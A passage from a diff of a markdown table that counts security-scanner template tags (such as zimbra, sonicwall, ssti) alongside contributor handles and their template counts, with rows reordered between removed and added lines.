+| graphql | 12 | alifathi-h1 | 3 | | | | | | | +| netsweeper | 12 | dr0pd34d | 3 | | | | | | | +| backup | 12 | skeltavik | 3 | | | | | | | +| rails | 12 | whoever | 3 | | | | | | | +| mail | 11 | lucasljm2001 | 3 | | | | | | | +| azure | 11 | me9187 | 3 | | | | | | | +| ssl | 11 | jarijaas | 3 | | | | | | | +| backdoor | 11 | ambassify | 3 | | | | | | | +| zyxel | 11 | f1tz | 3 | | | | | | | +| airflow | 11 | mavericknerd | 3 | | | | | | | +| cnvd2021 | 11 | supras | 3 | | | | | | | +| cisa | 11 | impramodsargar | 3 | | | | | | | +| webserver | 11 | fxploit | 3 | | | | | | | +| ruby | 10 | _generic_human_ | 3 | | | | | | | +| dell | 10 | z3bd | 3 | | | | | | | +| coldfusion | 10 | ricardo maia (brainfork) | 2 | | | | | | | +| glpi | 10 | hackerarpan | 2 | | | | | | | +| laravel | 10 | dbrwsky | 2 | | | | | | | +| grafana | 10 | smaranchand | 2 | | | | | | | +| django | 10 | convisoappsec | 2 | | | | | | | +| git | 10 | 0xrudra | 2 | | | | | | | +| jolokia | 10 | uomogrande | 2 | | | | | | | +| spring | 10 | github.com/its0x08 | 2 | | | | | | | +| ssh | 9 | thardt-praetorian | 2 | | | | | | | +| kube | 9 | nkxxkn | 2 | | | | | | | +| zimbra | 9 | 0xcrypto | 2 | | | | | | | +| fastjson | 9 | kre80r | 2 | | | | | | | +| windows | 9 | kiblyn11 | 2 | | | | | | | +| ssti | 9 | paperpen | 2 | | | | | | | +| wso2 | 9 | foulenzer | 2 | | | | | | | +| zabbix | 9 | luci | 2 | | | | | | | +| dedecms | 9 | paradessia | 2 | | | | | | | +| vcenter | 9 | rafaelwdornelas | 2 | | | | | | | +| versa | 9 | clarkvoss | 2 | | | | | | | +| prometheus | 9 | danielmofer | 2 | | | | | | | +| sonicwall | 9 | bananabr | 2 | | | | | | | +| phpmyadmin | 9 | s0obi | 2 | | | | | | | +| iis | 9 | brenocss | 2 | | | | | | | +| headless | 8 | 0xsapra | 2 | | | | | | | +| solarview | 8 | randomrobbie | 2 | | | | | | | +| mirai | 8 | taielab | 2 | | | | | | | +| jetbrains | 8 | canberbamber | 2 | | | | | | | +| solr | 8 | bernardofsr | 2 | | | | | | | +| npm | 8 | x1m_martijn | 2 | | | | | | | +| recon | 8 | dheerajmadhukar | 2 | | | | | | | +| citrix | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| auth | 8 | nvn1729 | 2 | | | | | | | +| cisco-switch | 8 | wa1tf0rme | 2 | | | | | | | +| config-audit | 8 | israel comazzetto dos reis | 2 | | | | | | | +| jboss | 8 | evergreencartoons | 2 | | | | | | | +| scada | 8 | 666asd | 2 | | | | | | | +| symfony | 8 | sy3omda | 2 | | | | | | | +| bucket | 8 | g4l1t0 | 2 | | | | | | | +| elasticsearch | 8 | n-thumann | 2 | | | | | | | +| hms | 8 | 0xnirvana | 2 | | | | | | | +| audit | 8 | joshlarsen | 2 | | | | | | | +| kafka | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| metadata | 8 | redteambrasil | 2 | | | | | | | +| samsung | 7 | hetroublemakr | 2 | | | | | | | +| nodejs | 7 | parth | 2 | | | | | | | +| seeyon | 7 | martincodes-de | 2 | | | | | | | +| detect | 7 | gal nagli | 2 | | | | | | | +| docker | 7 | zomsop82 | 2 | | | | | | | +| maps | 7 | gevakun | 2 | | | | | | | +| go | 7 | udit_thakkur | 2 | | | | | | | +| cnvd2020 | 7 | afaq | 2 | | | | | | | +| ognl | 7 | r12w4n | 2 | | | | | | | +| icewarp | 7 | codexlynx | 2 | | | | | | | +| opencats | 7 | vavkamil | 2 | | | | | | | +| firebase | 7 | notnotnotveg | 2 | | | | | | | +| squirrelmail | 7 | joeldeleep | 2 | | | | | | | +| exchange | 7 | k11h-de | 2 | | | | | | | +| python | 7 | moritz nentwig | 2 | | | | | | | +| druid | 7 | pxmme1337 | 2 | | | | | | | +| blind | 7 | korteke | 2 | | | | | | | +| liferay | 6 | 0xelkomy | 2 | | | | | | | +| vms | 6 | ehsahil | 2 | | | | | | | +| bypass | 6 | kishore-hariram | 2 | | | | | | | +| zhiyuan | 6 | amsda | 2 | | | | | | | +| slack | 6 | nuk3s3c | 2 | | | | | | | +| activemq | 6 | badboycxcc | 2 | | | | | | | +| jetty | 6 | lotusdll | 2 | | | | | | | +| huawei | 6 | cocxanh | 2 | | | | | | | +| moodle | 6 | 0xsmiley | 2 | | | | | | | +| fpd | 6 | mohammedsaneem | 2 | | | | | | | +| bigip | 6 | socketz | 2 | | | | | | | +| ofbiz | 6 | thezakman | 2 | | | | | | | +| lucee | 6 | fabaff | 2 | | | | | | | +| microstrategy | 6 | sbani | 2 | | | | | | | +| cobbler | 6 | geekby | 2 | | | | | | | +| emerge | 6 | ree4pwn | 2 | | | | | | | +| node | 6 | cckuakilong | 2 | | | | | | | +| kubelet | 6 | 0xprial | 2 | | | | | | | +| admin | 6 | myztique | 2 | | | | | | | +| db | 6 | huowuzhao | 2 | | | | | | | +| openvpn | 6 | bp0lr | 2 | | | | | | | +| cache | 6 | true13 | 2 | | | | | | | +| elfinder | 6 | dahse89 | 2 | | | | | | | +| sitecore | 6 | vsh00t | 2 | | | | | | | +| smtp | 6 | v0idc0de | 2 | | | | | | | +| enum | 6 | w4cky_ | 2 | | | | | | | +| jamf | 6 | ajaysenr | 2 | | | | | | | +| artica | 6 | y4er | 2 | | | | | | | +| crlf | 6 | koti2 | 2 | | | | | | | +| thinkphp | 6 | bsysop | 2 | | | | | | | +| opensis | 6 | bing0o | 2 | | | | | | | +| websphere | 6 | d4vy | 2 | | | | | | | +| magmi | 6 | 8arthur | 2 | | | | | | | +| setup | 6 | manas_harsh | 2 | | | | | | | +| rconfig | 6 | z0ne | 2 | | | | | | | +| ecology | 6 | raesene | 2 | | | | | | | +| cockpit | 5 | nagli | 1 | | | | | | | +| gogs | 5 | co0nan | 1 | | | | | | | +| leak | 5 | florianmaak | 1 | | | | | | | +| apisix | 5 | sherlocksecurity | 1 | | | | | | | +| metinfo | 5 | furkansenan | 1 | | | | | | | +| redis | 5 | phyr3wall | 1 | | | | | | | +| filemanager | 5 | aceseven (digisec360) | 1 | | | | | | | +| strapi | 5 | caon | 1 | | | | | | | +| s3 | 5 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| parallels | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| nagios | 5 | streetofhackerr007 | 1 | | | | | | | +| fortios | 5 | mubassirpatel | 1 | | | | | | | +| mongodb | 5 | miroslavsotak | 1 | | | | | | | +| carrental | 5 | charanrayudu | 1 | | | | | | | +| firmware | 5 | husain | 1 | | | | | | | +| fatpipe | 5 | jcockhren | 1 | | | | | | | +| rseenet | 5 | _darrenmartyn | 1 | | | | | | | +| scan | 5 | d0rkerdevil | 1 | | | | | | | +| solarwinds | 5 | h4kux | 1 | | | | | | | +| gocd | 5 | jbertman | 1 | | | | | | | +| storage | 5 | oscarintherocks | 1 | | | | | | | +| keycloak | 5 | intx0x80 | 1 | | | | | | | +| symantec | 5 | zinminphy0 | 1 | | | | | | | +| error | 5 | elder tao | 1 | | | | | | | +| minio | 5 | rojanrijal | 1 | | | | | | | +| rfi | 5 | 0ut0fb4nd | 1 | | | | | | | +| circarlife | 5 | chron0x | 1 | | | | | | | +| alibaba | 5 | matthew nickerson (b0than) @ | 1 | | | | | | | +| | | layer 8 security | | | | | | | | +| vbulletin | 5 | flag007 | 1 | | | | | | | +| database | 5 | sec_hawk | 1 | | | | | | | +| elastic | 5 | andysvints | 1 | | | | | | | +| prestashop | 5 | notsoevilweasel | 1 | | | | | | | +| 74cms | 5 | _harleo | 1 | | | | | | | +| plesk | 5 | open-sec | 1 | | | | | | | +| awstats | 5 | 0xd0ff9 | 1 | | | | | | | +| avideo | 5 | deena | 1 | | | | | | | +| beyondtrust | 4 | soyelmago | 1 | | | | | | | +| search | 4 | bibeksapkota (sar00n) | 1 | | | | | | | +| horde | 4 | danigoland | 1 | | | | | | | +| gitea | 4 | manuelbua | 1 | | | | | | | +| kibana | 4 | natto97 | 1 | | | | | | | +| telerik | 4 | opencirt | 1 | | | | | | | +| wcs | 4 | sak1 | 1 | | | | | | | +| jellyfin | 4 | imhunterand | 1 | | | | | | | +| voip | 4 | absshax | 1 | | | | | | | +| tikiwiki | 4 | shockwave | 1 | | | | | | | +| hoteldruid | 4 | mesaglio | 1 | | | | | | | +| hashicorp | 4 | adrianmf | 1 | | | | | | | +| oa | 4 | osamahamad | 1 | | | | | | | +| candidats | 4 | 5up3r541y4n | 1 | | | | | | | +| phpinfo | 4 | djoevanka | 1 | | | | | | | +| gnuboard | 4 | iampritam | 1 | | | | | | | +| aspose | 4 | thebinitghimire | 1 | | | | | | | +| typo3 | 4 | francescocarlucci | 1 | | | | | | | +| bmc | 4 | fq_hsu | 1 | | | | | | | +| terramaster | 4 | jas37 | 1 | | | | | | | +| openemr | 4 | yashgoti | 1 | | | | | | | +| artifactory | 4 | sinkettu | 1 | | | | | | | +| rabbitmq | 4 | akash.c | 1 | | | | | | | +| telesquare | 4 | kaizensecurity | 1 | | | | | | | +| cacti | 4 | duty_1g | 1 | | | | | | | +| linkerd | 4 | lingtren | 1 | | | | | | | +| mailchimp | 4 | yuansec | 1 | | | | | | | +| couchdb | 4 | paper-pen | 1 | | | | | | | +| cnvd2019 | 4 | thevillagehacker | 1 | | | | | | | +| kentico | 4 | vzamanillo | 1 | | | | | | | +| axigen | 4 | kiransau | 1 | | | | | | | +| umbraco | 4 | ramkrishna sawant | 1 | | | | | | | +| sophos | 4 | patralos | 1 | | | | | | | +| thinkcmf | 4 | lixts | 1 | | | | | | | +| sql | 4 | carlosvieira | 1 | | | | | | | +| asp | 4 | zsusac | 1 | | | | | | | +| oauth | 4 | b0rn2r00t | 1 | | | | | | | +| ampache | 4 | lethargynavigator | 1 | | | | | | | +| hikvision | 4 | alex | 1 | | | | | | | +| kevinlab | 4 | ggranjus | 1 | | | | | | | +| nexus | 4 | rotembar | 1 | | | | | | | +| photo | 4 | theabhinavgaur | 1 | | | | | | | +| prtg | 4 | miryangjung | 1 | | | | | | | +| springcloud | 4 | vinit989 | 1 | | | | | | | +| adminer | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| panos | 4 | 0xtavian | 1 | | | | | | | +| httpserver | 4 | petruknisme | 1 | | | | | | | +| puppet | 4 | kailashbohara | 1 | | | | | | | +| sonarqube | 4 | ph33rr | 1 | | | | | | | +| hybris | 4 | schniggie | 1 | | | | | | | +| console | 4 | 1nf1n7y | 1 | | | | | | | +| nosqli | 4 | j33n1k4 | 1 | | | | | | | +| resin | 4 | xshuden | 1 | | | | | | | +| stripe | 4 | tim_koopmans | 1 | | | | | | | +| hpe | 4 | ratnadip gajbhiye | 1 | | | | | | | +| ruckus | 4 | secthebit | 1 | | | | | | | +| xmlrpc | 4 | 8authur | 1 | | | | | | | +| paypal | 4 | 0xceeb | 1 | | | | | | | +| caucho | 4 | pascalheidmann | 1 | | | | | | | +| flink | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| wcs | 4 | zhenwarx | 1 | | | | | | | -| resin | 4 | jbaines-r7 | 1 | | | | | | | -| mailchimp | 4 | un-fmunozs | 1 | | | | | | | -| caucho | 4 | d0rkerdevil | 1 | | | | | | | -| hybris | 4 | mhdsamx | 1 | | | | | | | -| ampache | 4 | zinminphy0 | 1 | | | | | | | -| kentico | 4 | luskabol | 1 | | | | | | | -| redmine | 4 | coldfish | 1 | | | | | | | -| axigen | 4 | ahmed abou-ela | 1 | | | | | | | -| stripe | 4 | andysvints | 1 | | | | | | | -| gitea | 4 | b0yd | 1 | | | | | | | -| roxy | 4 | gboddin | 1 | | | | | | | -| sonarqube | 4 | jbertman | 1 | | | | | | | -| horde | 4 | skylark-lab | 1 | | | | | | | -| asp | 4 | kurohost | 1 | | | | | | | -| beyondtrust | 4 | queencitycyber | 1 | | | | | | | -| terramaster | 4 | higor melgaço (eremit4) | 1 | | | | | | | -| typo3 | 4 | sak1 | 1 | | | | | | | -| gnuboard | 4 | pascalheidmann | 1 | | | | | | | -| royalevent | 4 | notsoevilweasel | 1 | | | | | | | -| httpserver | 4 | lingtren | 1 | | | | | | | -| thinkcmf | 4 | rivalsec | 1 | | | | | | | -| cve2007 | 4 | elmahdi | 1 | | | | | | | -| zte | 4 | blckraven | 1 | | | | | | | -| nexus | 4 | harshinsecurity | 1 | | | | | | | -| console | 4 | compr00t | 1 | | | | | | | -| hashicorp | 4 | ringo | 1 | | | | | | | -| sql | 4 | screamy | 1 | | | | | | | -| panos | 4 | ok_bye_now | 1 | | | | | | | -| telerik | 4 | deena | 1 | | | | | | | -| phpinfo | 4 | vinit989 | 1 | | | | | | | -| springcloud | 4 | megamansec | 1 | | | | | | | -| umbraco | 4 | hanlaomo | 1 | | | | | | | -| oauth | 4 | 0h1in9e | 1 | | | | | | | -| telesquare | 4 | hakluke | 1 | | | | | | | -| hongdian | 4 | jrolf | 1 | | | | | | | -| hikvision | 4 | dale clarke | 1 | | | | | | | -| ems | 4 | caon | 1 | | | | | | | -| xmlrpc | 4 | bughuntersurya | 1 | | | | | | | -| cnvd2019 | 4 | amanrawat | 1 | | | | | | | -| hoteldruid | 4 | tea | 1 | | | | | | | -| vrealize | 4 | unkl4b | 1 | | | | | | | -| candidats | 4 | dievus | 1 | | | | | | | -| aspose | 4 | akshansh | 1 | | | | | | | -| sendgrid | 4 | aringo | 1 | | | | | | | -| cacti | 4 | kaizensecurity | 1 | | | | | | | -| adminer | 4 | calumjelrick | 1 | | | | | | | -| flink | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| zte | 4 | luqman | 1 | | | | | | | +| dropbear | 4 | mah3sec_ | 1 | | | | | | | +| sendgrid | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| cve2007 | 4 | willd96 | 1 | | | | | | | +| sangfor | 4 | ilovebinbash | 1 | | | | | | | +| yeswiki | 4 | exid | 1 | | | | | | | +| hongdian | 4 | mass0ma | 1 | | | | | | | +| phppgadmin | 4 | mantissts | 1 | | | | | | | +| ems | 4 | couskito | 1 | | | | | | | +| roxy | 4 | jrolf | 1 | | | | | | | +| postmessage | 4 | manasmbellani | 1 | | | | | | | +| redmine | 4 | hexcat | 1 | | | | | | | +| vrealize | 4 | lrtk-coder | 1 | | | | | | | +| tenda | 4 | udyz | 1 | | | | | | | +| royalevent | 4 | philippdelteil | 1 | | | | | | | +| netdata | 3 | spac3wh1te | 1 | | | | | | | +| dom | 3 | tirtha | 1 | | | | | | | +| kfm | 3 | undefl0w | 1 | | | | | | | +| ivanti | 3 | izn0u | 1 | | | | | | | +| payara | 3 | ransomsec | 1 | | | | | | | +| ebs | 3 | jeya.seelan | 1 | | | | | | | +| axis | 3 | jteles | 1 | | | | | | | +| linksys | 3 | sshell | 1 | | | | | | | +| ampps | 3 | 0xteles | 1 | | | | | | | +| mantisbt | 3 | w0tx | 1 | | | | | | | +| matrix | 3 | marcos_iaf | 1 | | | | | | | +| cve2005 | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| r-seenet | 3 | ahmetpergamum | 1 | | | | | | | +| zeroshell | 3 | amnotacat | 1 | | | | | | | +| kingsoft | 3 | ipanda | 1 | | | | | | | +| finecms | 3 | daviey | 1 | | | | | | | +| blockchain | 3 | alevsk | 1 | | | | | | | +| modem | 3 | iphantasmic | 1 | | | | | | | +| nortek | 3 | retr02332 | 1 | | | | | | | +| openstack | 3 | blckraven | 1 | | | | | | | +| trendnet | 3 | makyotox | 1 | | | | | | | +| redash | 3 | gboddin | 1 | | | | | | | +| kkfileview | 3 | berkdusunur | 1 | | | | | | | +| lansweeper | 3 | act1on3 | 1 | | | | | | | +| labkey | 3 | 0xceba | 1 | | | | | | | +| elementor | 3 | ohlinge | 1 | | | | | | | +| trixbox | 3 | bywalks | 1 | | | | | | | +| centos | 3 | elouhi | 1 | | | | | | | +| ec2 | 3 | omarkurt | 1 | | | | | | | +| superadmin | 3 | jeya seelan | 1 | | | | | | | +| tableau | 3 | amanrawat | 1 | | | | | | | +| openfire | 3 | dievus | 1 | | | | | | | +| buffalo | 3 | remonsec | 1 | | | | | | | +| nuuo | 3 | tehtbl | 1 | | | | | | | +| graylog | 3 | evolutionsec | 1 | | | | | | | +| fileman | 3 | f1she3 | 1 | | | | | | | +| proftpd | 3 | jbaines-r7 | 1 | | | | | | | +| thinfinity | 3 | hakimkt | 1 | | | | | | | +| processwire | 3 | hakluke | 1 | | | | | | | +| sharepoint | 3 | ooooooo_q | 1 | | | | | | | +| movable | 3 | cookiehanhoan | 1 | | | | | | | +| fuelcms | 3 | s1r1u5_ | 1 | | | | | | | +| digitalrebar | 3 | elitebaz | 1 | | | | | | | +| globalprotect | 3 | regala_ | 1 | | | | | | | +| odoo | 3 | nerrorsec | 1 | | | | | | | +| dotcms | 3 | harshinsecurity | 1 | | | | | | | +| yonyou | 3 | stupidfish | 1 | | | | | | | +| goanywhere | 3 | bad5ect0r | 1 | | | | | | | +| servicenow | 3 | b0yd | 1 | | | | | | | +| pega | 3 | pjborah | 1 | | | | | | | +| webadmin | 3 | ldionmarcil | 1 | | | | | | | +| geoserver | 3 | failopen | 1 | | | | | | | +| zend | 3 | nielsing | 1 | | | | | | | +| geowebserver | 3 | maximus decimus | 1 | | | | | | | +| messaging | 3 | micha3lb3n | 1 | | | | | | | +| pfsense | 3 | evan rubinstien | 1 | | | | | | | +| sugarcrm | 3 | igibanez | 1 | | | | | | | +| octobercms | 3 | pry0cc | 1 | | | | | | | +| dreambox | 3 | furkansayim | 1 | | | | | | | +| eshop | 3 | andirrahmani1 | 1 | | | | | | | +| jeesns | 3 | borna nematzadeh | 1 | | | | | | | +| jupyter | 3 | retr0 | 1 | | | | | | | +| circleci | 3 | bartu utku sarp | 1 | | | | | | | +| thruk | 3 | udinchan | 1 | | | | | | | +| harbor | 3 | nytr0gen | 1 | | | | | | | +| drawio | 3 | kba@sogeti_esec | 1 | | | | | | | +| jfrog | 3 | realexp3rt | 1 | | | | | | | +| subrion | 3 | 0xh7ml | 1 | | | | | | | +| pip | 3 | ok_bye_now | 1 | | | | | | | +| panabit | 3 | ahmed abou-ela | 1 | | | | | | | +| dolibarr | 3 | pratik khalane | 1 | | | | | | | +| log | 3 | juicypotato1 | 1 | | | | | | | +| atom | 3 | justmumu | 1 | | | | | | | +| digitalocean | 3 | mrcl0wnlab | 1 | | | | | | | +| mikrotik | 3 | sickwell | 1 | | | | | | | +| bruteforce | 3 | daffianfo | 1 | | | | | | | +| getsimple | 3 | aresx | 1 | | | | | | | +| mcafee | 3 | rodnt | 1 | | | | | | | +| codeigniter | 3 | geraldino2 | 1 | | | | | | | +| microfocus | 3 | hardik-rathod | 1 | | | | | | | +| qnap | 3 | dawid-czarnecki | 1 | | | | | | | +| bigant | 3 | tea | 1 | | | | | | | +| voipmonitor | 3 | nobody | 1 | | | | | | | +| empirecms | 3 | official_blackhat13 | 1 | | | | | | | +| wordfence | 3 | shreyapohekar | 1 | | | | | | | +| concrete | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| bitrix | 3 | thelicato | 1 | | | | | | | +| bitbucket | 3 | remi gascou (podalirius) | 1 | | | | | | | +| nacos | 3 | viniciuspereiras | 1 | | | | | | | +| pentaho | 3 | erethon | 1 | | | | | | | +| heroku | 3 | dk999 | 1 | | | | | | | +| netlify | 3 | lamscun | 1 | | | | | | | +| ansible | 3 | xstp | 1 | | | | | | | +| telnet | 3 | shivampand3y | 1 | | | | | | | +| intercom | 3 | xeldax | 1 | | | | | | | +| httpd | 3 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| nosqli | 4 | rojanrijal | 1 | | | | | | | -| voip | 4 | lark lab | 1 | | | | | | | -| couchdb | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| bmc | 4 | berkdusunur | 1 | | | | | | | -| rabbitmq | 4 | 0xd0ff9 | 1 | | | | | | | -| jellyfin | 4 | affix | 1 | | | | | | | -| dropbear | 4 | anon-artist | 1 | | | | | | | -| sophos | 4 | lethargynavigator | 1 | | | | | | | -| artifactory | 4 | lrtk-coder | 1 | | | | | | | -| hpe | 4 | dk999 | 1 | | | | | | | -| tenda | 4 | noamrathaus | 1 | | | | | | | -| kevinlab | 4 | ola456 | 1 | | | | | | | -| oa | 4 | imhunterand | 1 | | | | | | | -| photo | 4 | patralos | 1 | | | | | | | -| tikiwiki | 4 | alperenkesk | 1 | | | | | | | -| prtg | 4 | udinchan | 1 | | | | | | | -| kibana | 4 | maximus decimus | 1 | | | | | | | -| sangfor | 4 | clment cruchet | 1 | | | | | | | -| openemr | 4 | andirrahmani1 | 1 | | | | | | | -| puppet | 4 | ramkrishna sawant | 1 | | | | | | | -| paypal | 4 | yashanand155 | 1 | | | | | | | -| postmessage | 4 | official_blackhat13 | 1 | | | | | | | -| yeswiki | 4 | brabbit10 | 1 | | | | | | | -| search | 4 | h4kux | 1 | | | | | | | -| phppgadmin | 4 | dawid-czarnecki | 1 | | | | | | | -| linkerd | 4 | 0xteles | 1 | | | | | | | -| seagate | 3 | qlkwej | 1 | | | | | | | -| subrion | 3 | phyr3wall | 1 | | | | | | | -| geowebserver | 3 | juicypotato1 | 1 | | | | | | | -| intercom | 3 | husain | 1 | | | | | | | -| messaging | 3 | lamscun | 1 | | | | | | | -| lotus | 3 | paper-pen | 1 | | | | | | | -| sftp | 3 | sshell | 1 | | | | | | | -| redash | 3 | luqman | 1 | | | | | | | -| r-seenet | 3 | soyelmago | 1 | | | | | | | -| rocketchat | 3 | 0xceeb | 1 | | | | | | | -| dzzoffice | 3 | kr1shna4garwal | 1 | | | | | | | -| rackn | 3 | tim_koopmans | 1 | | | | | | | -| cloudflare | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| selenium | 3 | tirtha | 1 | | | | | | | +| openam | 3 | exploitation | 1 | | | | | | | | teamcity | 3 | sicksec | 1 | | | | | | | -| unifi | 3 | infosecsanyam | 1 | | | | | | | -| wordfence | 3 | omarkurt | 1 | | | | | | | -| digitalocean | 3 | 2rs3c | 1 | | | | | | | -| dolibarr | 3 | rubina119 | 1 | | | | | | | -| axis2 | 3 | xstp | 1 | | | | | | | -| graph | 3 | sickwell | 1 | | | | | | | -| nacos | 3 | adrianmf | 1 | | | | | | | -| webmin | 3 | opencirt | 1 | | | | | | | -| aptus | 3 | elouhi | 1 | | | | | | | -| consul | 3 | noraj | 1 | | | | | | | -| movable | 3 | droberson | 1 | | | | | | | -| glassfish | 3 | 0xrod | 1 | | | | | | | -| kfm | 3 | mantissts | 1 | | | | | | | -| labkey | 3 | micha3lb3n | 1 | | | | | | | -| actuator | 3 | ooooooo_q | 1 | | | | | | | -| httpd | 3 | shifacyclewla | 1 | | | | | | | -| bitrix | 3 | jeya.seelan | 1 | | | | | | | -| jupyter | 3 | b0rn2r00t | 1 | | | | | | | -| dotcms | 3 | stupidfish | 1 | | | | | | | -| globalprotect | 3 | x6263 | 1 | | | | | | | -| payara | 3 | viondexd | 1 | | | | | | | -| octobercms | 3 | narluin | 1 | | | | | | | -| kingsoft | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| voipmonitor | 3 | shivampand3y | 1 | | | | | | | -| mikrotik | 3 | y0no | 1 | | | | | | | -| dom | 3 | arm!tage | 1 | | | | | | | -| bruteforce | 3 | pry0cc | 1 | | | | | | | -| epson | 3 | pudsec | 1 | | | | | | | -| openstack | 3 | bernardo rodrigues | 1 | | | | | | | +| graph | 3 | zandros0 | 1 | | | | | | | +| consul | 3 | 0h1in9e | 1 | | | | | | | +| synology | 3 | dale clarke | 1 | | | | | | | +| rocketchat | 3 | p-l- | 1 | | | | | | | +| key | 3 | allenwest24 | 1 | | | | | | | +| sentry | 3 | kareemse1im | 1 | | | | | | | +| axis2 | 3 | luqmaan hadia | 1 | | | | | | | +| selenium | 3 | rschio | 1 | | | | | | | +| steve | 3 | hanlaomo | 1 | | | | | | | +| 3cx | 3 | compr00t | 1 | | | | | | | +| sftp | 3 | alexrydzak | 1 | | | | | | | +| unifi | 3 | ahmed sherif | 1 | | | | | | | +| avtech | 3 | ling | 1 | | | | | | | +| actuator | 3 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | | | | | | | | +| facebook | 3 | 0xrod | 1 | | | | | | | +| seagate | 3 | arm!tage | 1 | | | | | | | +| grav | 3 | mhdsamx | 1 | | | | | | | +| mautic | 3 | toufik-airane | 1 | | | | | | | +| dzzoffice | 3 | rubina119 | 1 | | | | | | | +| flexvnf | 3 | higor melgaço (eremit4) | 1 | | | | | | | +| lotus | 3 | arall | 1 | | | | | | | +| httpbin | 3 | breno_css | 1 | | | | | | | +| glassfish | 3 | ola456 | 1 | | | | | | | +| openbmcs | 3 | jaskaran | 1 | | | | | | | +| aptus | 3 | droberson | 1 | | | | | | | +| clusterengine | 3 | pudsec | 1 | | | | | | | +| splunk | 3 | exceed | 1 | | | | | | | +| mobileiron | 3 | narluin | 1 | | | | | | | +| weiphp | 3 | x6263 | 1 | | | | | | | +| smb | 3 | piyushchhiroliya | 1 | | | | | | | +| express | 3 | orpheus | 1 | | | | | | | +| epson | 3 | qlkwej | 1 | | | | | | | +| webmail | 3 | becivells | 1 | | | | | | | +| rackn | 3 | shelld3v | 1 | | | | | | | +| fanruan | 3 | wabafet | 1 | | | | | | | +| hsphere | 3 | c3l3si4n | 1 | | | | | | | +| samba | 3 | megamansec | 1 | | | | | | | +| selea | 3 | skylark-lab | 1 | | | | | | | +| square | 3 | shiar | 1 | | | | | | | +| webmin | 3 | rivalsec | 1 | | | | | | | +| targa | 3 | httpvoid | 1 | | | | | | | +| metabase | 3 | liquidsec | 1 | | | | | | | +| rlm | 3 | prettyboyaaditya | 1 | | | | | | | +| mongo | 3 | unkl4b | 1 | | | | | | | +| cloudflare | 3 | aaronchen0 | 1 | | | | | | | +| influxdb | 3 | viondexd | 1 | | | | | | | +| ranger | 2 | push4d | 1 | | | | | | | +| globaldomains | 2 | yashanand155 | 1 | | | | | | | +| ucmdb | 2 | lark lab | 1 | | | | | | | +| weather | 2 | wlayzz | 1 | | | | | | | +| bigbluebutton | 2 | kabirsuda | 1 | | | | | | | +| sequoiadb | 2 | noamrathaus | 1 | | | | | | | +| cargo | 2 | arr0way | 1 | | | | | | | +| pmb | 2 | affix | 1 | | | | | | | +| netis | 2 | brabbit10 | 1 | | | | | | | +| idea | 2 | af001 | 1 | | | | | | | +| upload | 2 | arjunchandarana | 1 | | | | | | | +| azkaban | 2 | th3.d1p4k | 1 | | | | | | | +| xiaomi | 2 | coldfish | 1 | | | | | | | +| xampp | 2 | noraj | 1 | | | | | | | +| tornado | 2 | apt-mirror | 1 | | | | | | | +| fastcgi | 2 | akshansh | 1 | | | | | | | +| xceedium | 2 | ofjaaah | 1 | | | | | | | +| dokuwiki | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| cve2005 | 3 | cookiehanhoan | 1 | | | | | | | -| geoserver | 3 | alexrydzak | 1 | | | | | | | -| superadmin | 3 | retr02332 | 1 | | | | | | | -| mobileiron | 3 | j33n1k4 | 1 | | | | | | | -| matrix | 3 | alevsk | 1 | | | | | | | -| webadmin | 3 | fq_hsu | 1 | | | | | | | -| lansweeper | 3 | miryangjung | 1 | | | | | | | -| webmail | 3 | rodnt | 1 | | | | | | | -| panabit | 3 | yuansec | 1 | | | | | | | -| express | 3 | schniggie | 1 | | | | | | | -| openbmcs | 3 | florianmaak | 1 | | | | | | | -| netlify | 3 | bywalks | 1 | | | | | | | -| fuelcms | 3 | exceed | 1 | | | | | | | -| sharepoint | 3 | sinkettu | 1 | | | | | | | -| modem | 3 | hexcat | 1 | | | | | | | -| digitalrebar | 3 | marcos_iaf | 1 | | | | | | | -| ivanti | 3 | aaronchen0 | 1 | | | | | | | -| hsphere | 3 | f1she3 | 1 | | | | | | | -| centos | 3 | shelld3v | 1 | | | | | | | -| facebook | 3 | jas37 | 1 | | | | | | | -| servicenow | 3 | co0nan | 1 | | | | | | | -| pip | 3 | s1r1u5_ | 1 | | | | | | | -| drawio | 3 | exploitation | 1 | | | | | | | -| empirecms | 3 | oscarintherocks | 1 | | | | | | | -| ebs | 3 | remi gascou (podalirius) | 1 | | | | | | | -| qnap | 3 | lixts | 1 | | | | | | | -| proftpd | 3 | arjunchandarana | 1 | | | | | | | -| mantisbt | 3 | 0xtavian | 1 | | | | | | | -| fileman | 3 | mubassirpatel | 1 | | | | | | | -| fanruan | 3 | hakimkt | 1 | | | | | | | -| clusterengine | 3 | petruknisme | 1 | | | | | | | -| trendnet | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| thinfinity | 3 | kba@sogeti_esec | 1 | | | | | | | -| pentaho | 3 | dhiyaneshdki | 1 | | | | | | | -| nuuo | 3 | elitebaz | 1 | | | | | | | -| synology | 3 | bjhulst | 1 | | | | | | | -| thruk | 3 | amnotacat | 1 | | | | | | | -| mautic | 3 | secthebit | 1 | | | | | | | -| ansible | 3 | undefl0w | 1 | | | | | | | -| atom | 3 | evolutionsec | 1 | | | | | | | -| sentry | 3 | ahmed sherif | 1 | | | | | | | -| yonyou | 3 | ilovebinbash | 1 | | | | | | | -| selea | 3 | jteles | 1 | | | | | | | -| trixbox | 3 | borna nematzadeh | 1 | | | | | | | -| kkfileview | 3 | nerrorsec | 1 | | | | | | | -| grav | 3 | daffianfo | 1 | | | | | | | -| openfire | 3 | tehtbl | 1 | | | | | | | -| log | 3 | furkansayim | 1 | | | | | | | -| mcafee | 3 | 